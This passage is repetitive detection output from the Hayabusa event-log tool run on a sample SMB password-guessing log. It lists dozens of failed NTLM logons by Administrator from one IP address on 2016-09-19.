+00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: hnPnB2lEN3BSDpXJ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:42.228 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: dVMyeF9jGuzHkTHg | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:42.269 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: sDKLl3PjW2qrzJGa | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:42.316 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: rkllnePSq3NQ5wgC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:42.359 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: j9qLWgQnR7P9cs7s | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:42.408 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: C1AdU07nzvv7RB2i | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 
+2016-09-19 16:51:42.452 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: cHgiB5SMiQtsl5oD | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:42.499 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 03e7QOn36l0jH35H | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:42.548 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: DoJBywV8x8cURwrO | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:42.583 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: SDYGYO6s6g6Dbx8r | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:42.621 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: nUqXpeTNePFyBmCo | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:42.657 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: T2h0qJWcbzRe1GSj | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:42.697 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: edsfNOovOl1Ow503 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:42.740 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: cxCC83XLMIJrNMvl | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:42.785 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MzussOcg5ihdrnD0 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:42.841 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 55l4HKICu8x0FpQv | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:42.891 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5GmlVWDjZ75tT08G | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:42.933 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: o6v1DkuFvB04PESQ | IP Addr: 
192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:42.977 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: VTLdNb0XbzXuLi51 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:43.016 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: CSjDYb1BhHC9UTxO | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:43.054 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: V1yLH19VsfLx9BGF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:43.096 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: X4AVhjdz9yHsfss0 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:43.133 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: bqWLOKaKwS8VBxDj | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:43.181 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 
EjK8A8DTSYursBzj | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:43.225 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: UaDCKPslwRaLBWtH | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:43.274 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: xAvoekviFDSAIgBe | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:43.310 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 3XOmFwh8IamESWCM | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:43.357 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 54GbW769j1x27mrI | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:43.394 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: bZSkhwZXc1SSknDT | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:43.435 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | 
Type: 3 | Computer: 05AuqlN44x7oJGoi | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:43.482 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: RQ4A6ReTVTcFCFeN | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:43.532 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: T7U6i4CMrL0bHouf | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:43.573 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: NaeA4uZ6o8BRbzwf | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:43.626 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MEnlL5BHmlCrtk7p | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:43.669 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: KRNMpwAAaTsyzPfR | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:43.709 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: 
Administrator | Type: 3 | Computer: oBtHQkRWIoq5hfn7 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:43.752 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5pkk9lgqMQ4wxQel | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:43.801 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: yQVan7kRDOlnim50 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:43.857 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 9282GqsC7UiUMbRl | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:43.892 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 3lj7GjYryW9wjGgS | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:43.990 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MPy4iUy5WBSLUBdy | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:44.041 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - 
Wrong Password,User: Administrator | Type: 3 | Computer: 0kvD9DEuos8SRrLH | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:44.085 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: NH1EnMG6fTvcz4QR | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:44.131 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: cqHDXSQn8gkl2LJy | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:44.164 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: RWI9XDDHjs2xcNB7 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:44.210 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Zo53mEz6nal5Gxff | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:44.256 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: jtOgC6wqMoNYVxId | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:44.297 
+00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: DdadoJYvD7DYjlSG | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:44.341 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: U1xjdqjT9h0KUqG2 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:44.389 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: QfkzZBvO4onYx6JZ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:44.432 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: JqY8CvyODDLQV9Ps | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:44.482 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: nPMRIxRVuh13jmZD | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:44.523 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: jARkTWdKTfTIwlug | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 
+2016-09-19 16:51:44.567 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Zwhkc71Nfn7QDf7c | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:44.612 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: qsYad9PgEajlYqvo | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:44.649 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: v9YPw0DsspVbrOld | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:44.696 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: wsHpLCOdAOPFM6nD | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:44.732 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: OcNytOhGOZKaREL9 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:44.768 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: lc5boBVigHE1ccGA | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:44.819 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: BQXg4ZHdBYHyiTTO | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:44.853 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: JebTJzyn91NrpvkD | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:44.888 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 8wCE5ypjEU5feEEv | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:44.928 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: OglsROoqX48xm0gJ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:44.956 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5bNC9ES3l3KwXPxb | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:45.004 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: byPavQuiscMm7CMW | IP Addr: 
192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:45.042 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: UQESAC3XpxCJJfG5 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:45.084 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5aYRnzirSj0PNXAE | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:45.116 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 8s9xJ659geFHOlY4 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:45.154 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: yBQdyO0diiFixwlx | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:45.197 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: vzULtccOFnLIRiVM | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:45.232 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 
1pDEGzqTAyUab5P8 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:45.274 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: gomgb26W9qFacRr7 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:45.318 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: GXOcDu88S5c5VwwV | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:45.363 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: WHRnzgQkfAhsUguj | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:45.401 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: A0Q9ZIaRK43W9apv | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:45.453 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 2xvriGeIlDwtzS36 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:45.498 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | 
